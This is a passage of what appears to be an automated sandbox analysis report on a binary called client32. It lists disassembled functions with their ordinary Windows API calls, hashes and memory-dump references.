                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
                                                                                  • String ID: Show has overrun too much, aborting
                                                                                  • API String ID: 304545663-4092325870
                                                                                  • Opcode ID: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                                  • Instruction ID: 9026de0c3b0683949d6f7ac94f5710338a9a532b2cd303e3c01edb637dee248d
                                                                                  • Opcode Fuzzy Hash: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                                  • Instruction Fuzzy Hash: 50F0B4B4B016139BFB59CBB08914BD9F69DBF8071DF000118E92C97280EB70B224C7D2
                                                                                  Function 1101D3C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,?), ref: 1101D3EB
                                                                                  • EnableWindow.USER32(00000000,?), ref: 1101D3F6
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                  • API String ID: 1136984157-1986719024
                                                                                  • Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                  • Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
                                                                                  • Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                  • Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4
                                                                                  Function 11027530 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23sleepthreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnumExitSleepThreadWindows
                                                                                  • String ID: TapiFix
                                                                                  • API String ID: 1804117399-2824097521
                                                                                  • Opcode ID: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                                  • Instruction ID: 0d22cb111dc1a1c74f2ece42ee292e751dc76676b098746739fa73436add6467
                                                                                  • Opcode Fuzzy Hash: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                                  • Instruction Fuzzy Hash: C7E04838A4167CAFE615DB918D84F56BA989B5535CF810030E4351664597B07940C7A9
                                                                                  Function 1101D410 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,?), ref: 1101D43F
                                                                                  • ShowWindow.USER32(00000000), ref: 1101D446
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                  • API String ID: 1319256379-1986719024
                                                                                  • Opcode ID: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                                  • Instruction ID: e0f7042720cd81023d22bad3d6b473d4ff1ed87f82d399384176be7cf1b5ebc2
                                                                                  • Opcode Fuzzy Hash: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                                  • Instruction Fuzzy Hash: D3E04F7594032DBBC7049A95DC89EEAB39CEB54229F008025F92556600E670A84087A0
                                                                                  Function 11165643 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2782032738-0
                                                                                  • Opcode ID: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
                                                                                  • Instruction ID: 2bbfea60a2a12786820c2de27e6caf434d82015e81e2d2deebce7f4ca3d92771
                                                                                  • Opcode Fuzzy Hash: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
                                                                                  • Instruction Fuzzy Hash: 7541F635A00B05DFDB558F65D94059EFBBEEF803A4F254128D45597240E7F6ED60CB40
                                                                                  Function 11067900 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MessageBeep.USER32(00000000), ref: 1106791B
                                                                                  • MessageBeep.USER32(00000000), ref: 11067957
                                                                                  • MessageBeep.USER32(00000000), ref: 110679AA
                                                                                  • MessageBeep.USER32(00000000), ref: 110679EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: BeepMessage
                                                                                  • String ID:
                                                                                  • API String ID: 2359647504-0
                                                                                  • Opcode ID: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
                                                                                  • Instruction ID: 4a014cbc1c5237b7f0567ced4e31e585fd70e1907f22ab32dda50b08ea234cb0
                                                                                  • Opcode Fuzzy Hash: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
                                                                                  • Instruction Fuzzy Hash: 5831C275640610ABE728CF54C882F77B3F8EF84B10F01859AF95687685E3B5E950C3B1
                                                                                  Function 11049130 Relevance: 6.1, APIs: 4, Instructions: 112windowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
                                                                                    • Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731
                                                                                  • _malloc.LIBCMT ref: 110491DD
                                                                                  • _memmove.LIBCMT ref: 110491EA
                                                                                  • SendMessageTimeoutA.USER32(?,0000004A,0006040E,?,00000002,00001388,?), ref: 11049224
                                                                                  • _free.LIBCMT ref: 1104922B
                                                                                    • Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
                                                                                    • Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
                                                                                    • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
                                                                                    • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
                                                                                    • Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$ClassIdleInputMessageNameSendSleepTimeoutWaitWindow_free_malloc_memmovewsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 176360892-0
                                                                                  • Opcode ID: 46178d18f3e88452c3922ee6de201f6dc9fb41c74dc40f097fdd869246f2e59b
                                                                                  • Instruction ID: d41a6b91d128f2eeea48cc74d118894cce712679c930bdd2d1ac7c58a8e7d684
                                                                                  • Opcode Fuzzy Hash: 46178d18f3e88452c3922ee6de201f6dc9fb41c74dc40f097fdd869246f2e59b
                                                                                  • Instruction Fuzzy Hash: 60316075E0061AABDB04DF94CD81BEEB3B8FF48718F104179E915A7684E731AE05CBA1
                                                                                  Function 110297F0 Relevance: 6.1, APIs: 4, Instructions: 104sleepthreadwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateThread.KERNEL32(00000000,00001000,11027690,00000000,00000000,111EE468), ref: 11029813
                                                                                  • Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029832
                                                                                  • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029854
                                                                                  • Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102985C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: SleepThread$CreateMessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 3347742789-0
                                                                                  • Opcode ID: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
                                                                                  • Instruction ID: 2ae3116f5df8233203c0b5b7c047d092e18a9fbb085bfb1a1d8cc4b180184980
                                                                                  • Opcode Fuzzy Hash: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
                                                                                  • Instruction Fuzzy Hash: F331C576E43232EBE212DBD9CC80FB6B798A745B68F514135F928972C8D2706841CFD0
                                                                                  Function 11179775 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111797A9
                                                                                  • __isleadbyte_l.LIBCMT ref: 111797DC
                                                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117980D
                                                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117987B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                  • String ID:
                                                                                  • API String ID: 3058430110-0
                                                                                  • Opcode ID: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
                                                                                  • Instruction ID: dd7da2bd4d1e27f38930cbdbffb8ca2b0741d821671db88b966082c1cf8912a5
                                                                                  • Opcode Fuzzy Hash: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
                                                                                  • Instruction Fuzzy Hash: 1331AE31A0029EEFEB01DF64C9849AEFFA6EF01330F1585A9E4648B290F730D954CB51
                                                                                  Function 110B3700 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(0000002C,50D94AA1,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B372F
                                                                                  • LeaveCriticalSection.KERNEL32(0000002C,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B376F
                                                                                  • SetEvent.KERNEL32(?), ref: 110B37EA
                                                                                  • LeaveCriticalSection.KERNEL32(0000002C), ref: 110B37F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$EnterEvent
                                                                                  • String ID:
                                                                                  • API String ID: 3394196147-0
                                                                                  • Opcode ID: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
                                                                                  • Instruction ID: 8acebb29280036c6a802c58c088d91b2f5c0a2bed23f5f36a778171c733041f7
                                                                                  • Opcode Fuzzy Hash: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
                                                                                  • Instruction Fuzzy Hash: BC314A75A44B059FD325CF69C980B9AFBE4FB48314F10862EE85AC7B50EB34A850CB90
                                                                                  Function 11043660 Relevance: 6.1, APIs: 4, Instructions: 84windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 110684E0: EnterCriticalSection.KERNEL32(?,50D94AA1,00000000,00002710,00000001,11027140,50D94AA1,00000000,00002710,?,?,00000000,11182BE8,000000FF,?,110294CE), ref: 1106858A
                                                                                  • SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 110436CA
                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 110436D1
                                                                                  • IsWindow.USER32(00000000), ref: 110436DE
                                                                                  • GetWindowRect.USER32(00000000,1104A5A0), ref: 110436F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
